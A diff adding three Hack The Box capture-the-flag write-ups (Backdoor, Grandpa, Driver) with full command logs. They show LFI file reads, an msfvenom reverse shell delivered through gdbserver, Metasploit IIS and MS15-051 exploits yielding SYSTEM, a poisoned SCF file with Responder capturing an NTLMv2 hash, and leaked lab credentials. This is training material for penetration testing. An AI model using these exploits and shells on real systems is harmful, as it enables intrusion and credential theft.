+ systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+ systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+ messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
+ syslog:x:104:110::/home/syslog:/usr/sbin/nologin
+ _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+ tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
+ uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
+ tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
+ landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
+ pollinate:x:110:1::/var/cache/pollinate:/bin/false
+ usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+ sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
+ systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
+ user:x:1000:1000:user:/home/user:/bin/bash
+ lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
+ mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
+
+So here we have credentials: **wordpressuser:MQYBJSaD#DxG6qbm** and we also have the list of users with the passwd file.
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Backdoor]
+ → for i in `seq 620 1000`; do curl --output - http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php\?ebookdownloadurl\=/proc/$i/cmdline ; echo ; done
+
+
+
+Let it run, and eventually you'll find the gdbserver process running on port 1337:
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/13 ] [~]
+ → nmap -sCV backdoor.htb -p1337
+ Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-30 09:41 CET
+ Nmap scan report for backdoor.htb (10.129.96.68)
+ Host is up (0.094s latency).
+
+ PORT STATE SERVICE VERSION
+ 1337/tcp open waste?
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 107.13 seconds
+
+
+
+So to exploit gdbserver, we follow this page on [hacktricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-remote-gdbserver):
+
+
+ [ 10.10.14.37/23 ] [ /dev/pts/13 ] [~]
+ → msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.37 LPORT=8001 PrependFork=true -f elf -o rev.elf
+ [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
+ [-] No arch selected, selecting arch: x64 from the payload
+ No encoder specified, outputting raw payload
+ Payload size: 106 bytes
+ Final size of elf file: 226 bytes
+ Saved as: rev.elf
+
+
+
+Then locally, we debug it:
+
+
+ [term1]
+ [ 10.10.14.37/23 ] [ /dev/pts/16 ] [~]
+ → nc -lvnp 8001
+ listening on [any] 8001 ...
+
+ [term2]
+ [ 10.10.14.37/23 ] [ /dev/pts/13 ] [~]
+ → gdb -q rev.elf
+ Reading symbols from rev.elf...
+ (No debugging symbols found in rev.elf)
+ (gdb) target extended-remote 10.129.96.68
+ 10.129.96.68: No such file or directory.
+ (gdb) **target extended-remote 10.129.96.68:1337**
+ Remote debugging using 10.129.96.68:1337
+ Reading /lib64/ld-linux-x86-64.so.2 from remote target...
+ warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
+ Reading /lib64/ld-linux-x86-64.so.2 from remote target...
+ Reading symbols from target:/lib64/ld-linux-x86-64.so.2...
+ Reading /usr/lib/debug/.build-id/53/74b5558386b815e69cc1838a6052cc9b4746f3.debug from remote target...
+ Reading /lib64/ld-2.31.so from remote target...
+ Reading /lib64/.debug/ld-2.31.so from remote target...
+ Reading /usr/lib/debug//lib64/ld-2.31.so from remote target...
+ Reading /usr/lib/debug/lib64//ld-2.31.so from remote target...
+ Reading target:/usr/lib/debug/lib64//ld-2.31.so from remote target...
+ (No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2)
+ Reading /usr/lib/debug/.build-id/42/86d016f71e32db3a4f7221c847c3d1e13d6bd4.debug from remote target...
+ 0x00007ffff7fd0100 in ?? () from target:/lib64/ld-linux-x86-64.so.2
+
+ (gdb) **remote put rev.elf /dev/shm/nihilist**
+ Successfully sent file "rev.elf".
+
+ (gdb) **run**
+ The program being debugged has been started already.
+ Start it from the beginning? (y or n) y
+ Starting program:
+ Reading /dev/shm/nihilist from remote target...
+ Reading /dev/shm/nihilist from remote target...
+ Reading symbols from target:/dev/shm/nihilist...
+ (No debugging symbols found in target:/dev/shm/nihilist)
+ Reading /usr/lib/debug/.build-id/42/86d016f71e32db3a4f7221c847c3d1e13d6bd4.debug from remote target...
+ [Detaching after fork from child process 7213]
+ [Inferior 1 (process 7204) exited normally]
+ (gdb)
+
+ [term1]
+ [ 10.10.14.37/23 ] [ /dev/pts/16 ] [~]
+ → nc -lvnp 8001
+ listening on [any] 8001 ...
+ connect to [10.10.14.37] from (UNKNOWN) [10.129.96.68] 49544
+ id
+ uid=1000(user) gid=1000(user) groups=1000(user)
+
+
+
+And we got the reverse shell! Now let's upgrade it to a fully interactive TTY:
+
+
+ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ user@Backdoor:/home/user$ ^Z
+ [1] + 216968 suspended nc -lvnp 8001
+
+ [ 10.10.14.37/23 ] [ /dev/pts/16 ] [~]
+ → stty raw -echo ; fg
+ [1] + 216968 continued nc -lvnp 8001
+ export TERM=screen-256color
+ user@Backdoor:/home/user$ export SHELL=bash
+ user@Backdoor:/home/user$ stty rows 50 cols 200
+ user@Backdoor:/home/user$ reset
+
+
+
+Now that we have a fully interactive reverse shell, let's print the user flag:
+
+
+ user@Backdoor:/home/user$ cat user.txt
+ 3fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to enumerate privesc paths, we run linpeas.sh :
+
+
+ [term1]
+ [ 10.10.14.37/23 ] [ /dev/pts/15 ] [~/HTB/Backdoor]
+ → ls
+ linpeas.sh
+
+ [ 10.10.14.37/23 ] [ /dev/pts/15 ] [~/HTB/Backdoor]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+ user@Backdoor:/home/user$ wget http://10.10.14.37:9090/linpeas.sh -O /tmp/peas.sh
+ --2022-11-30 10:11:59-- http://10.10.14.37:9090/linpeas.sh
+ Connecting to 10.10.14.37:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 827827 (808K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[===================>] 808.42K 266KB/s in 3.0s
+
+ 2022-11-30 10:12:03 (266 KB/s) - ‘/tmp/peas.sh’ saved [827827/827827]
+
+ user@Backdoor:/home/user$ chmod +x /tmp/peas.sh
+ user@Backdoor:/home/user$ /tmp/peas.sh
+
+
+
+
+Let it run, then in the output we see more info regarding gdbserver, but we can also see it with the ps command:
+
+
+ user@Backdoor:/home/user$ ps auxww | grep gdb
+ root 945 0.0 0.0 2608 1796 ? Ss 08:39 0:00 /bin/sh -c while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
+ root 14328 0.0 0.1 8404 3880 ? S 10:06 0:00 su user -c cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
+ user 14332 0.0 0.1 6892 3316 ? Ss 10:06 0:00 bash -c cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
+ user 14336 0.0 0.2 11844 4160 ? S 10:06 0:00 gdbserver --once 0.0.0.0:1337 /bin/true
+ user 31115 0.0 0.0 6632 732 pts/2 S+ 10:16 0:00 grep --color=auto gdb
+
+ user@Backdoor:/home/user$ ps auxww | grep true
+ root 945 0.0 0.0 2608 1796 ? Ss 08:39 0:00 /bin/sh -c while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
+ root 950 0.0 0.0 2608 1544 ? Ss 08:39 0:02 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
+ root 14328 0.0 0.1 8404 3880 ? S 10:06 0:00 su user -c cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
+ user 14332 0.0 0.1 6892 3316 ? Ss 10:06 0:00 bash -c cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
+ user 14336 0.0 0.2 11844 4160 ? S 10:06 0:00 gdbserver --once 0.0.0.0:1337 /bin/true
+ user 31338 0.0 0.0 6632 732 pts/2 S+ 10:17 0:00 grep --color=auto true
+
+
+
+When looking at the processes, we see that there is also a script running **screen** as the root user, so let's enumerate it:
+
+
+ user@Backdoor:/home/user$ screen -ls
+ No Sockets found in /run/screen/S-user.
+
+ user@Backdoor:/home/user$ screen -ls root/
+ There is a suitable screen on:
+ 995.root (11/30/22 08:39:42) (Multi, detached)
+ 1 Socket in /run/screen/S-root.
+
+
+
+Here we see the root user is running screen on the socket /root/screen/S-root, so we connect to it:
+
+
+ user@Backdoor:/home/user$ screen -x root/995
+ root@Backdoor:~# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@Backdoor:~# cat root.txt
+ 2dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/7.md b/Easy/7.md
new file mode 100644
index 0000000..936c118
--- /dev/null
+++ b/Easy/7.md
@@ -0,0 +1,391 @@
+# Grandpa Writeup
+
+
+
+## Introduction :
+
+Grandpa was an Easy Windows box released back in april 2017. It features a well known service with alot of metasploit options for us to work with.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ **λ root [ 10.10.14.48/23 ] [/home/nihilist] → nmap -sC -sV 10.10.10.14**
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 16:54 CET
+ Nmap scan report for 10.10.10.14
+ Host is up (0.035s latency).
+ Not shown: 999 filtered ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 6.0
+ | http-methods:
+ |_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
+ | http-ntlm-info:
+ | Target_Name: GRANPA
+ | NetBIOS_Domain_Name: GRANPA
+ | NetBIOS_Computer_Name: GRANPA
+ | DNS_Domain_Name: granpa
+ | DNS_Computer_Name: granpa
+ |_ Product_Version: 5.2.3790
+ |_http-server-header: Microsoft-IIS/6.0
+ |_http-title: Under Construction
+ | http-webdav-scan:
+ | Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
+ | Server Date: Mon, 11 Nov 2019 15:57:04 GMT
+ | Server Type: Microsoft-IIS/6.0
+ | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ |_ WebDAV type: Unknown
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 13.51 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Firt of all let's see if IIS 6.0 has any publicly-known vulnerabilities using the **searchsploit** command.
+
+
+ λ nihilist [ 93.23.12.196 ] [~] → searchsploit IIS 6.0
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disc | exploits/windows/remote/21057.txt
+ Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow | exploits/windows/remote/9541.pl
+ Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service | exploits/windows/dos/9587.txt
+ Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | exploits/windows/dos/3965.pl
+ Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service | exploits/windows/dos/15167.txt
+ Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | exploits/windows/remote/41738.py
+ Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | exploits/windows/remote/8704.txt
+ Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | exploits/windows/remote/8806.pl
+ Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP) | exploits/windows/remote/8765.php
+ Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | exploits/windows/remote/8754.patch
+ Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | exploits/windows/remote/19033.txt
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+
+For the first part we will try the exploit named "scstoragepathfromurl" which should give us a low privilege meterpreter session on the machine.
+
+
+ msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
+
+ Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ MAXPATHLENGTH 60 yes End of physical path brute force
+ MINPATHLENGTH 3 yes Start of physical path brute force
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes Path of IIS 6 web application
+ VHOST no HTTP server virtual host
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Microsoft Windows Server 2003 R2 SP2 x86
+
+
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOST 10.10.10.14
+ RHOST => 10.10.10.14
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check
+ [+] 10.10.10.14:80 - The target is vulnerable.
+
+
+By typing the msf keyword **"Check"** We see that metasploit tells us that the target should be vulnerable to the iis webdav scs storagepath fromurl vulnerability. Let's test it.
+
+
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [*] Trying path length 3 to 60 ...
+ [*] Sending stage (180291 bytes) to 10.10.10.14
+ [*] Meterpreter session 1 opened (10.10.14.48:4444 -> 10.10.10.14:1030) at 2019-11-11 16:56:26 +0100
+
+ meterpreter > sysinfo
+ Computer : GRANPA
+ OS : Windows .NET Server (5.2 Build 3790, Service Pack 2).
+ Architecture : x86
+ System Language : en_US
+ Domain : HTB
+ Logged On Users : 2
+ Meterpreter : x86/windows
+ meterpreter >
+
+
+
+ meterpreter > shell
+ [-] Failed to spawn shell with thread impersonation. Retrying without it.
+ Process 2820 created.
+ Channel 2 created.
+ Microsoft Windows [Version 5.2.3790]
+ (C) Copyright 1985-2003 Microsoft Corp.
+
+ c:\windows\system32\inetsrv>cd ../../..
+ cd ../../..
+
+ C:\>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 246C-D7FE
+
+ Directory of C:\
+
+ 04/12/2017 04:27 PM **IR> ADFS
+ 04/12/2017 04:04 PM 0 AUTOEXEC.BAT
+ 04/12/2017 04:04 PM 0 CONFIG.SYS
+ 04/12/2017 04:32 PM **IR> Documents and Settings
+ 04/12/2017 04:17 PM **IR> FPSE_search
+ 04/12/2017 04:17 PM **IR> Inetpub
+ 12/24/2017 07:18 PM **IR> Program Files
+ 12/24/2017 07:27 PM **IR> WINDOWS
+ 04/12/2017 04:05 PM **IR> wmpub
+ 2 File(s) 0 bytes
+ 7 Dir(s) 18,127,511,552 bytes free
+
+ C:\>cd Documents And Settings
+ cd Documents And Settings
+
+ C:\Documents and Settings>cd Harry
+ cd Harry
+ Access is denied.
+
+ C:\Documents and Settings>exit
+ meterpreter >
+
+
+We now have a low-privileged meterpreter session, let's see what processes are running on this machine to see if we could migrate to it.
+
+
+ meterpreter > ps
+
+ Process List
+ ============
+
+ PID PPID Name Arch Session User Path
+ --- ---- ---- ---- ------- ---- ----
+ 0 0 [System Process]
+ 4 0 System
+ 272 4 smss.exe
+ 324 272 csrss.exe
+ 348 272 winlogon.exe
+ 396 348 services.exe
+ 408 348 lsass.exe
+ 616 396 svchost.exe
+ 680 396 svchost.exe
+ 740 396 svchost.exe
+ 768 396 svchost.exe
+ 804 396 svchost.exe
+ 940 396 spoolsv.exe
+ 968 396 msdtc.exe
+ 1080 396 cisvc.exe
+ 1124 396 svchost.exe
+ 1184 396 inetinfo.exe
+ 1220 396 svchost.exe
+ 1328 396 VGAuthService.exe
+ 1416 396 vmtoolsd.exe
+ 1464 396 svchost.exe
+ 1604 396 svchost.exe
+ 1716 396 alg.exe
+ 1796 396 dllhost.exe
+ **1824 616 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe**
+ 1920 396 dllhost.exe
+ 2024 1464 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
+ 2124 616 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
+ 2232 396 vssvc.exe
+ 2288 2024 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
+
+ meterpreter > migrate 1824
+ [*] Migrating from 2288 to 1824...
+
+
+
+ meterpreter > migrate 1824
+ [*] Migrating from 2288 to 1824...
+ [-] Error running command migrate: Rex::TimeoutError Operation timed out.
+ meterpreter > exit
+ [*] Shutting down Meterpreter...
+
+ [*] 10.10.10.14 - Meterpreter session 3 closed. Reason: User exit
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [*] Trying path length 3 to 60 ...
+ [*] Sending stage (180291 bytes) to 10.10.10.14
+ [*] Meterpreter session 4 opened (10.10.14.48:4444 -> 10.10.10.14:1032) at 2019-11-11 17:11:01 +0100
+ [*] Sending stage (180291 bytes) to 10.10.10.14
+ [*] Meterpreter session 5 opened (10.10.14.48:4444 -> 10.10.10.14:1031) at 2019-11-11 17:11:08 +0100
+
+ meterpreter > shell
+ Process 2996 created.
+ Channel 1 created.
+ Microsoft Windows [Version 5.2.3790]
+ (C) Copyright 1985-2003 Microsoft Corp.
+
+ C:\WINDOWS\system32>whoami
+ whoami
+ nt authority\network service
+
+ C:\WINDOWS\system32>
+
+
+We seem to have elevated a few privileges, but that's not enough as you can see below.
+
+
+ C:\WINDOWS\system32>cd ../..
+ cd ../..
+
+ C:\>cd Documents and Settings
+ cd Documents and Settings
+
+ C:\Documents and Settings>cd Harry
+ cd Harry
+ Access is denied.
+
+ C:\Documents and Settings>cd Administrator
+ cd Administrator
+ Access is denied.
+
+ C:\Documents and Settings>exit
+ exit
+
+
+Let's see if we can effectively privesc on this machine. We will run the local exploit suggester on our meterpreter session.
+
+
+ meterpreter > run post/multi/recon/local_exploit_suggester
+
+ [*] 10.10.10.14 - Collecting local exploits for x86/windows...
+ [*] 10.10.10.14 - 29 exploit checks are being tried...
+ [+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
+ [+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
+ [+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
+
+ [+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
+
+ [+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
+ [+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
+ [+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
+ [+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
+ [+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
+
+
+We have got plenty of exploits to try ! Let's find out which will give us an elevated privilege meterpreter session.
+
+## **Part 3 : The Root Access**
+
+After a couple of failed attempts at finding the correct local exploit for grandpa, i finally tried the exploit **ms15_051_client_copy_image**. It is an exploit which takes advantage of Windows Kernel-Mode Drivers's vulnerabilities, which should effectively give us an elevation of privilege for our meterpreter session.
+
+
+ meterpreter > background
+ [*] Backgrounding session 5...
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms15_051_client_copy_image
+ msf5 exploit(windows/local/ms15_051_client_copy_image) > show options
+
+ Module options (exploit/windows/local/ms15_051_client_copy_image):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ SESSION yes The session to run this module on.
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Windows x86
+
+
+ msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 5
+ SESSION => 5
+ msf5 exploit(windows/local/ms15_051_client_copy_image) > set PAYLOAD windows/meterpreter/reverse_tcp
+ PAYLOAD => windows/meterpreter/reverse_tcp
+ msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.14.48
+ LHOST => 10.10.14.48
+
+
+We use the aforementionned exploit and set the payload to **windows/meterpreter/reverse_tcp** with the correct LHOST parameter for the elevated privilege meterpreter to connect back to our host machine. Let's run it to see if we can effectively privesc this machine.
+
+
+ msf5 exploit(windows/local/ms15_051_client_copy_image) > run
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [*] Launching notepad to host the exploit...
+ [+] Process 3496 launched.
+ [*] Reflectively injecting the exploit DLL into 3496...
+ [*] Injecting exploit into 3496...
+ [*] Exploit injected. Injecting payload into 3496...
+ [*] Payload injected. Executing exploit...
+ [*] Sending stage (180291 bytes) to 10.10.10.14
+ [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
+ [*] Meterpreter session 6 opened (10.10.14.48:4444 -> 10.10.10.14:1035) at 2019-11-11 17:20:34 +0100
+
+ meterpreter > shell
+ Process 3652 created.
+ Channel 1 created.
+ Microsoft Windows [Version 5.2.3790]
+ (C) Copyright 1985-2003 Microsoft Corp.
+
+ C:\WINDOWS\system32>whoami
+ whoami
+ nt authority\system
+
+ C:\WINDOWS\system32>cd ../../..
+ cd ../../..
+
+ C:\>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 246C-D7FE
+
+ Directory of C:\
+
+ 04/12/2017 04:27 PM **IR> ADFS
+ 04/12/2017 04:04 PM 0 AUTOEXEC.BAT
+ 04/12/2017 04:04 PM 0 CONFIG.SYS
+ 04/12/2017 04:32 PM **IR> Documents and Settings
+ 04/12/2017 04:17 PM **IR> FPSE_search
+ 04/12/2017 04:17 PM **IR> Inetpub
+ 12/24/2017 07:18 PM **IR> Program Files
+ 12/24/2017 07:27 PM **IR> WINDOWS
+ 04/12/2017 04:05 PM **IR> wmpub
+ 2 File(s) 0 bytes
+ 7 Dir(s) 18,127,536,128 bytes free
+
+ C:\>cd Documents and Settings
+ cd Documents and Settings
+
+ C:\Documents and Settings>cd Harry
+ cd Harry
+
+ C:\Documents and Settings\Harry>cd Desktop
+ cd Desktop
+
+ C:\Documents and Settings\Harry\Desktop>more user.txt
+ more user.txt
+ bdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ C:\Documents and Settings\Harry\Desktop>cd ../../Administrator/Desktop
+ cd ../../Administrator/Desktop
+
+ C:\Documents and Settings\Administrator\Desktop>more root.txt
+ more root.txt
+ 93XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And thats it ! **exploit/windows/local/ms15_051_client_copy_image** returned our meterpreter session as NT AUTHORITY\ SYSTEM, and we have been able to get both the user and root flags.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/70.md b/Easy/70.md
new file mode 100644
index 0000000..cbc822c
--- /dev/null
+++ b/Easy/70.md
@@ -0,0 +1,426 @@
+# Driver Writeup
+
+
+
+## Introduction :
+
+Driver is an easy Linux box released back in October 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB]
+ → nmap -sCV driver.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-21 18:39 UTC
+ Nmap scan report for driver.htb (10.129.95.238)
+ Host is up (0.054s latency).
+ Not shown: 997 filtered tcp ports (no-response)
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 10.0
+ | http-auth:
+ | HTTP/1.1 401 Unauthorized\x0D
+ |_ Basic realm=MFP Firmware Update Center. Please enter password for admin
+ |_http-server-header: Microsoft-IIS/10.0
+ |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ 135/tcp open msrpc Microsoft Windows RPC
+ 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
+ Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ |_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
+ | smb2-security-mode:
+ | 3.1.1:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2022-11-22T01:39:18
+ |_ start_date: 2022-11-22T01:38:10
+ |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 53.89 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80, so let's investigate it:
+
+
+
+We try randomly admin:admin as the credentials and we login:
+
+
+
+Now in order to exploit this MFP Firmware Update Center we need to make a scf file as seen [here](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/):
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Driver]
+ → vim file.scf
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Driver]
+ → cat file.scf
+ [Shell]
+ Command = 2
+ IconFile = "\\10.10.16.14\nihilism\nothing.txt"
+
+ [Taskbar]
+ Command = "ToggleDesktop"
+
+
+
+Then start a responder session as we upload the poisoned file:
+
+
+
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Driver]
+ → sudo responder -I tun0
+ __
+ .----.-----.-----.-----.-----.-----.--| |.-----.----.
+ | _| -__|__ --| _ | _ | | _ || -__| _|
+ |__| |_____|_____| __|_____|__|__|_____||_____|__|
+ |__|
+
+ NBT-NS, LLMNR & MDNS Responder 3.1.3.0
+
+ To support this project:
+ Patreon -> https://www.patreon.com/PythonResponder
+ Paypal -> https://paypal.me/PythonResponder
+
+ Author: Laurent Gaffie (laurent.gaffie@gmail.com)
+ To kill this script hit CTRL-C
+
+
+ [+] Poisoners:
+ LLMNR [ON]
+ NBT-NS [ON]
+ MDNS [ON]
+ DNS [ON]
+ DHCP [OFF]
+
+ [+] Servers:
+ HTTP server [ON]
+ HTTPS server [ON]
+ WPAD proxy [OFF]
+ Auth proxy [OFF]
+ SMB server [ON]
+ Kerberos server [ON]
+ SQL server [ON]
+ FTP server [ON]
+ IMAP server [ON]
+ POP3 server [ON]
+ SMTP server [ON]
+ DNS server [ON]
+ LDAP server [ON]
+ RDP server [ON]
+ DCE-RPC server [ON]
+ WinRM server [ON]
+
+ [+] HTTP Options:
+ Always serving EXE [OFF]
+ Serving EXE [OFF]
+ Serving HTML [OFF]
+ Upstream Proxy [OFF]
+
+ [+] Poisoning Options:
+ Analyze Mode [OFF]
+ Force WPAD auth [OFF]
+ Force Basic Auth [OFF]
+ Force LM downgrade [OFF]
+ Force ESS downgrade [OFF]
+
+ [+] Generic Options:
+ Responder NIC [tun0]
+ Responder IP [10.10.16.14]
+ Responder IPv6 [dead:beef:4::100c]
+ Challenge set [random]
+ Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
+
+ [+] Current Session Variables:
+ Responder Machine Name [WIN-KPBKT26EKRE]
+ Responder Domain Name [3PO9.LOCAL]
+ Responder DCE-RPC Port [49204]
+
+ [+] Listening for events...
+
+
+ **[SMB] NTLMv2-SSP Client : 10.129.95.238
+ [SMB] NTLMv2-SSP Username : DRIVER\tony
+ [SMB] NTLMv2-SSP Hash : tony::DRIVER:64ee36aaad12f422:90CD51833EC5C7FD768608DC128B0072:0101000000000000007514F0DAFDD80130D95B9D9FCE853D0000000002000800330050004F00390001001E00570049004E002D004B00500042004B0054003200360045004B005200450004003400570049004E002D004B00500042004B0054003200360045004B00520045002E00330050004F0039002E004C004F00430041004C0003001400330050004F0039002E004C004F00430041004C0005001400330050004F0039002E004C004F00430041004C0007000800007514F0DAFDD8010600040002000000080030003000000000000000000000000020000082E65A8610E38B2DCBA3BF1A4B03692BFC2D79B0F9EC686F467516427284BDD40A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003400000000000000000000000000
+ [*] Skipping previously captured hash for DRIVER\tony
+ [*] Skipping previously captured hash for DRIVER\tony
+ [*] Skipping previously captured hash for DRIVER\tony
